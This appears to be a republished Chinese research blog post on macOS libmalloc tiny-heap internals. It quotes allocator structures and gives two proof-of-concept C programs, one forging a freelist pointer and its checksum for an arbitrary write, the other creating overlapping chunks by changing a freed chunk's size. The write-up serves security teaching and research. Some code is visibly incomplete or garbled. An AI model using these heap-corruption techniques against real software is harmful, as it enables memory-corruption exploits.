macOS libmalloc 堆利用之一:Tiny 篇
Posted 星阑科技
篇首语:本文由小常识网(小编为大家整理,主要介绍了macOS libmalloc 堆利用之一:Tiny 篇相关的知识,希望对你有一定的参考价值。

MacOS 的堆管理结构采用的是 libmalloc,苹果公司也将这部分源代码进行了开源 。在 Angelboy 大神制作过的 Slide 的讲解基础上,本文通过源码和 poc,对 libmalloc 的一些基本原理和内容,以及一些相关的可利用技巧进行详细的阐述与说明。
正如 ptmalloc 的 fastbin、smallbin、unsorted bin 等一样,根据申请和释放的内存的不同的大小,libmalloc也进行了不同的匹配模式,分别为tiny、small、large。所以,第一篇文章主要是将详细介绍libmalloc的tiny机制,以及tiny的相关利用技巧。
本文涉及的 POC 代码等相关内容,可以在星阑科技的 Github 仓库[1]和研究组博客[2] 中找到,欢迎关注和 Star!



Szone 是整个内存管理的核心结构,记录着内存管理中其余各种关键结构体的指针和s相关信息,不需要做太深入的了解。
typedef struct szone_s { // vm_allocate()'d, so page-aligned to begin with.
malloc_zone_t basic_zone; // first page will be given read-only protection
uint8_t pad[PAGE_MAX_SIZE - sizeof(malloc_zone_t)];
unsigned long cpu_id_key; // unused
// remainder of structure is R/W (contains no function pointers)
unsigned debug_flags;
void *log_address;
/* Allocation racks per allocator type. */
struct rack_s tiny_rack;
struct rack_s small_rack;
struct rack_s medium_rack;
/* large objects: all the rest */
_malloc_lock_s large_szone_lock MALLOC_CACHE_ALIGN; // One customer at a time for large
unsigned num_large_objects_in_use;
unsigned num_large_entries;
large_entry_t *large_entries; // hashed by location; null entries don't count
size_t num_bytes_in_large_objects;
int large_entry_cache_oldest;
int large_entry_cache_newest;
large_entry_t large_entry_cache[LARGE_ENTRY_CACHE_SIZE_HIGH]; // "death row" for large malloc/free
int large_cache_depth;
size_t large_cache_entry_limit;
boolean_t large_legacy_reset_mprotect;
size_t large_entry_cache_reserve_bytes;
size_t large_entry_cache_reserve_limit;
size_t large_entry_cache_bytes; // total size of death row, bytes
/* flag and limits pertaining to altered malloc behavior for systems with
* large amounts of physical memory */
bool is_medium_engaged;
/* security cookie */
uintptr_t cookie;
/* The purgeable zone constructed by create_purgeable_zone() would like to hand off tiny and small
* allocations to the default scalable zone. Record the latter as the "helper" zone here. */
struct szone_s *helper_zone;
boolean_t flotsam_enabled;
} szone_t;

Malloc_zont_t 是一个vtable,里面存储着malloc、free、calloc各种负责垃圾回收的函数的指针的一个结构体。
typedef struct _malloc_zone_t {
/* Only zone implementors should depend on the layout of this structure;
Regular callers should use the access functions below */
void *reserved1; /* RESERVED FOR CFAllocator DO NOT USE */
void *reserved2; /* RESERVED FOR CFAllocator DO NOT USE */
size_t (* MALLOC_ZONE_FN_PTR(size))(struct _malloc_zone_t *zone, const void *ptr); /* returns the size of a block or 0 if not in this zone; must be fast, especially for negative answers */
void *(* MALLOC_ZONE_FN_PTR(malloc))(struct _malloc_zone_t *zone, size_t size);
void *(* MALLOC_ZONE_FN_PTR(calloc))(struct _malloc_zone_t *zone, size_t num_items, size_t size); /* same as malloc, but block returned is set to zero */
void *(* MALLOC_ZONE_FN_PTR(valloc))(struct _malloc_zone_t *zone, size_t size); /* same as malloc, but block returned is set to zero and is guaranteed to be page aligned */
void (* MALLOC_ZONE_FN_PTR(free))(struct _malloc_zone_t *zone, void *ptr);
void *(* MALLOC_ZONE_FN_PTR(realloc))(struct _malloc_zone_t *zone, void *ptr, size_t size);
void (* MALLOC_ZONE_FN_PTR(destroy))(struct _malloc_zone_t *zone); /* zone is destroyed and all memory reclaimed */
const char *zone_name;
/* Optional batch callbacks; these may be NULL */
unsigned (* MALLOC_ZONE_FN_PTR(batch_malloc))(struct _malloc_zone_t *zone, size_t size, void **results, unsigned num_requested); /* given a size, returns pointers capable of holding that size; returns the number of pointers allocated (maybe 0 or less than num_requested) */
void (* MALLOC_ZONE_FN_PTR(batch_free))(struct _malloc_zone_t *zone, void **to_be_freed, unsigned num_to_be_freed); /* frees all the pointers in to_be_freed; note that to_be_freed may be overwritten during the process */
struct malloc_introspection_t * MALLOC_INTROSPECT_TBL_PTR(introspect);
unsigned version;
/* aligned memory allocation. The callback may be NULL. Present in version >= 5. */
void *(* MALLOC_ZONE_FN_PTR(memalign))(struct _malloc_zone_t *zone, size_t alignment, size_t size);
/* free a pointer known to be in zone and known to have the given size. The callback may be NULL. Present in version >= 6.*/
void (* MALLOC_ZONE_FN_PTR(free_definite_size))(struct _malloc_zone_t *zone, void *ptr, size_t size);
/* Empty out caches in the face of memory pressure. The callback may be NULL. Present in version >= 8. */
size_t (* MALLOC_ZONE_FN_PTR(pressure_relief))(struct _malloc_zone_t *zone, size_t goal);
* Checks whether an address might belong to the zone. May be NULL. Present in version >= 10.
* False positives are allowed (e.g. the pointer was freed, or it's in zone space that has
* not yet been allocated. False negatives are not allowed.
boolean_t (* MALLOC_ZONE_FN_PTR(claimed_address))(struct _malloc_zone_t *zone, void *ptr);
} malloc_zone_t;

typedef struct tiny_header_inuse_pair {
uint32_t header;
uint32_t inuse;
} tiny_header_inuse_pair_t;
typedef struct {
// Block indices are +1 so that 0 represents no free block.
uint16_t first_block;
uint16_t last_block;
} region_free_blocks_t;
typedef struct region_trailer {
uint32_t region_cookie;
volatile int32_t pinned_to_depot;
struct region_trailer *prev;
struct region_trailer *next;
boolean_t recirc_suitable;
unsigned bytes_used;
unsigned objects_in_use; // Used only by tiny allocator.
mag_index_t mag_index;
} region_trailer_t;
typedef struct tiny_region {
tiny_block_t blocks[NUM_TINY_BLOCKS];
region_trailer_t trailer;
// The interleaved bit arrays comprising the header and inuse bitfields.
// The unused bits of each component in the last pair will be initialized to sentinel values.
tiny_header_inuse_pair_t pairs[CEIL_NUM_TINY_BLOCKS_WORDS];
// Indices of the first and last free block in this region. Value is the
// block index + 1 so that 0 indicates no free block in this region for the
// corresponding slot.
region_free_blocks_t free_blocks_by_slot[NUM_TINY_SLOTS];
uint8_t pad[TINY_REGION_PAD];
} * tiny_region_t;

Magazine 可以类比为glibc里面的arena结构。它的作用是用来管理堆的各种情况。
Magazine 有一层缓存结构,用来存储最新被free的ptr的各种信息。因为这种cache是直接记录 free 的 ptr 信息的,属于一种伪free操作,所以申请出来的时候不需要 unlink 操作,可以提升一些速度。但是必须满足 msize 完全相同才会将 cache 中的 ptr 返回,而不会发生从其中切取一部分内存的情况。
Magazine 有记录 free 情况的双向链表形式的free_list,但是这个双向链表不是循环双向链表。
Magazine 和 region 在内存分布上是彼此分离的,这样原语信息记录在magazine上,region只在过程中充当一个topchunk的功能,为了在某种程度上防止堆溢出吧。
typedef struct magazine_s { // vm_allocate()'d, so the array of magazines is page-aligned to begin with.
// Take magazine_lock first, Depot lock when needed for recirc, then szone->{tiny,small}_regions_lock when needed for alloc
_malloc_lock_s magazine_lock MALLOC_CACHE_ALIGN;
// Protection for the crtical section that does allocate_pages outside the magazine_lock
volatile boolean_t alloc_underway;
// One element deep "death row", optimizes malloc/free/malloc for identical size.
void *mag_last_free;
msize_t mag_last_free_msize; // msize for mag_last_free
uint32_t _pad;
region_t mag_last_free_rgn; // holds the region for mag_last_free
free_list_t mag_free_list[MAGAZINE_FREELIST_SLOTS];
// the first and last free region in the last block are treated as big blocks in use that are not accounted for
size_t mag_bytes_free_at_end;
size_t mag_bytes_free_at_start;
region_t mag_last_region; // Valid iff mag_bytes_free_at_end || mag_bytes_free_at_start > 0
// bean counting ...
size_t mag_num_bytes_in_objects;
size_t num_bytes_in_magazine;
unsigned mag_num_objects;
// recirculation list -- invariant: all regions owned by this magazine that meet the emptiness criteria
// are located nearer to the head of the list than any region that doesn't satisfy that criteria.
// Doubly linked list for efficient extraction.
unsigned recirculation_entries;
region_trailer_t *firstNode;
region_trailer_t *lastNode;
uintptr_t pad[320 - 14 - MAGAZINE_FREELIST_SLOTS -
uintptr_t pad[320 - 16 - MAGAZINE_FREELIST_SLOTS -
} magazine_t;

Rack 负责对magazine进行管理,我们需要知道的其最大的作用实际上是有cookie,负责对该rack区域的各种ptr做checksum的时候需要用到。
typedef struct rack_s {
/* Regions for tiny objects */
_malloc_lock_s region_lock MALLOC_CACHE_ALIGN;
rack_type_t type;
size_t num_regions;
size_t num_regions_dealloc;
region_hash_generation_t *region_generation;
region_hash_generation_t rg[2];
region_t initial_regions[INITIAL_NUM_REGIONS];
int num_magazines;
unsigned num_magazines_mask;
int num_magazines_mask_shift;
uint32_t debug_flags;
// array of per-processor magazines
magazine_t *magazines;
uintptr_t cookie;
uintptr_t last_madvise;
} rack_t;
void *mag_last_free;
msize_t mag_last_free_msize; // msize for mag_last_free
region_t mag_last_free_rgn; // holds the region for mag_last_free
这实际上是一层缓存结构,初始化之后是空的。源代码中可以看到做了简单的防止double free的检测。最新被free的ptr,和ptr的msize信息,以及对应的region信息,会存储在这三个字段。
static MALLOC_INLINE uintptr_t
free_list_checksum_ptr(rack_t *rack, void *ptr)
uintptr_t p = (uintptr_t)ptr;
return (p >> NYBBLE) | ((free_list_gen_checksum(p ^ rack->cookie) & (uintptr_t)0xF) << ANTI_NYBBLE); // compiles to rotate instruction
static MALLOC_INLINE void *
free_list_unchecksum_ptr(rack_t *rack, inplace_union *ptr)
inplace_union p;
uintptr_t t = ptr->u;
t = (t << NYBBLE) | (t >> ANTI_NYBBLE); // compiles to rotate instruction
p.u = t & ~(uintptr_t)0xF;
if ((t ^ free_list_gen_checksum(p.u ^ rack->cookie)) & (uintptr_t)0xF) {
free_list_checksum_botch(rack, ptr, (void *)ptr->u);
return p.p;
这里简单分析一下tiny free的流程,主要是为了对整个流程心中有数,对其中一些结构的作用有一些印象。libmalloc的free显然不是一个好的攻击面,从源代码中存在的一些检测中就可以大致看出,double free和house of spirit这两条路基本都被堵死了。
* 值得一提的是,最新版本的libmalloc的结构体发生了一些变化,可能做了更严格的检测,暂时没进行深入的探究。

ptr = free_list->p;
if (ptr) {
next = free_list_unchecksum_ptr(rack, &ptr->next);
free_list->p = next;
if (next) {
next->previous = ptr->previous;
} else {
BITMAPV_CLR(tiny_mag_ptr->mag_bitmap, slot);
this_msize = get_tiny_free_size(ptr);
goto add_leftover_and_proceed;
next->previous = ptr->previous;
uint64_t victim = 0x1234;
int main(int argc, const char * argv[]) {
void *p1,*p2,*p3,*p4,*p5;
p1 = malloc(0x20);
p2 = malloc(0x20);
p3 = malloc(0x20);
p4 = malloc(0x20);
p5 = malloc(0x30);
printf("victim address: %p, victim's value: 0x%lx ", &victim, victim);
printf("%p and %p will be freed in freelist ", p1, p3);
printf("%p will be freed in cache ", p5);
printf("%p's data is: [%p, %p, %p, %p] ", p1, *(uint64_t*)p1 ,*(uint64_t*)(p1+8), *(uint64_t*)(p1+0x10), *(uint64_t*)(p1+0x18));
printf("%p's data is: [%p, %p, %p, %p] ", p3, *(uint64_t*)p3 ,*(uint64_t*)(p3+8), *(uint64_t*)(p3+0x10), *(uint64_t*)(p3+0x18));
*(uint64_t*)p3 = 0xdeadbeef;
uint32_t checksum = *(uint32_t*)(p3+8+4);
printf("checksum: %p ", checksum>>28);
*(uint64_t*)(p3+8) = ((uint64_t)&victim>>4);
*(uint32_t*)(p3+8+4) = checksum;
printf("%p's data is: [%p, %p, %p, %p] ", p3, *(uint64_t*)p3 ,*(uint64_t*)(p3+8), *(uint64_t*)(p3+0x10), *(uint64_t*)(p3+0x18));
printf("malloc 0x20 to trigger attack. ");
printf("after attack, victim address: %p, victim's value: 0x%lx ", &victim, victim);
return 0;

next_msize = get_tiny_free_size(next_block);
// ...
tiny_free_list_remove_ptr(rack, tiny_mag_ptr, next_block, next_msize);
msize += next_msize;
int main(int argc, const char * argv[]) {
setbuf(stdin, 0);
setbuf(stdout, 0);
setbuf(stderr, 0);
void *p1,*p2,*p3,*p4,*p5;
p1 = malloc(0x30);
p2 = malloc(0x50);
p3 = malloc(0x40);
p4 = malloc(0x20);
printf("%p's data is: [%p, %p, %p, %p] ", p2, *(uint64_t*)p2 ,*(uint64_t*)(p2+8), *(uint64_t*)(p2+0x10), *(uint64_t*)(p2+0x18));
*(uint64_t*)p2 = 0;
*(uint64_t*)(p2+8) = 0;
*(uint8_t*)(p2+0x10) = 0x9;
printf("change %p's msize ", p2);
printf("%p's data is: [%p, %p, %p, %p] ", p2, *(uint64_t*)p2 ,*(uint64_t*)(p2+8), *(uint64_t*)(p2+0x10), *(uint64_t*)(p2+0x18));
printf("free %p to cache, free %p to free_list ", p3, p1);
void* t1 = malloc(0xc0);
printf("use %p to trigger chunk overlap. ", t1);
void* t2 = malloc(0x40);
printf("get pointer %p from cache ", t2);
*(uint64_t*)t2 = 0x1234;
printf("%p's data: %p ", t2, *(uint64_t*)t2);
*(uint64_t*)(t1+0x80) = 0xdeadbeef;
printf("use %p chunk overlap to change %p's data ", t1, t2);
printf("after overlap, %p's data: %p ", t2, *(uint64_t*)t2);
return 0;

以上是关于macOS libmalloc 堆利用之一:Tiny 篇的主要内容,如果未能解决你的问题,请参考以下文章